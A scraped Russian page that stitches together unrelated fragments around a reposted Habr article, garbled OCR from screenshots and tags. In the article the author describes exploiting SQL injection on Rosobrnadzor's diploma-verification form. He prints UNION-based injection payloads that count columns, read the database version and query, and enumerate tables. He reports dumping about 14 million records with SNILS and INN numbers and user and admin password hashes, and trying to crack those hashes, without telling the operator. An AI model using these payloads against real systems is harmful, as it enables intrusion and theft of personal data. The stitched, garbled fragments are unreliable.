— Да, ты никаким образом не Бэтмен, — согласилась Никсель, и поежилась, испуганно вглядываясь в окружающую нас темноту. Несмотря на то, что она всего лишь повторила сказанное мной минутой раньше, прозвучало это неожиданно обидно.

Zangasta.
https://habr.com/post/413011/

"И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках"


Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.

ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ ОБРАЗОВАНИЯ И НАУКИ
РОСОБРНАДЗОР,взлом,информационная безопасность,sql,PostgreSQL,длиннопост,geektimes,habrahabr,текст,Истории,obrnadzor,много букв,рособрнадзор,СНИЛС,инн,дыра


Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).

Для поиска введите точные значения реквизитов, указанные на бланке документа: Более подробно о работе с данным сервисом можно ознакомиться по ссылке
Уровень образования
Не выбрано
Уровна* обрио
Наименование 00: Фамилия обладателя документа: Серия бланка: Номер бланка Дата выдачи:
О Найти 00 по


Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2><p>SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "4"LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U... ^</p>

Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.

Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция
...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…

В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…

В ответ пришёл JSON, в котором было:

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit
Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…

Ответ:
"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…

Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…

Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…

Если бы я увидел эту картинку

ГД Новея группе
в	Новый секретный чат
	Создать канал
*	Храмы
А	Мои храмы
в	Контакты
	Пригласить друзей
а	Молитвослов Календаре Библит
#	Молитва по соглашению
ф Магазин
О Настройки
ф Вопросы и ответы о Те1едгаш,Клуб аметистов,клуб атеистов,разное,telegram,РПЦ,интернет,хабрахабр


отдельно от новости, я бы подумал, что это картинка-смишнявка, сляпанная в фотошопе. Но ведь это прям новость на хабре. Ссылки под "Создать канал" - это просто сюр какой-то.
https://habrahabr.ru/company/piter/blog/277325/
4-е издание
ОСНОВЫ ПРОЕКТИРОВАНИЯ
Е	Р	Ф
ВЗАИМОДЕЙСТВИЯ
Е	Й	С
Алы Kjrrtj. pc&jt РКао». Д}рд крв*«>. Кдоофер Ноам
Cgnrrrep-
WILEY,рокк ебол,хабрахабр,песочница
Здесь мы собираем самые интересные картинки, арты, комиксы, мемасики по теме (+148 постов - )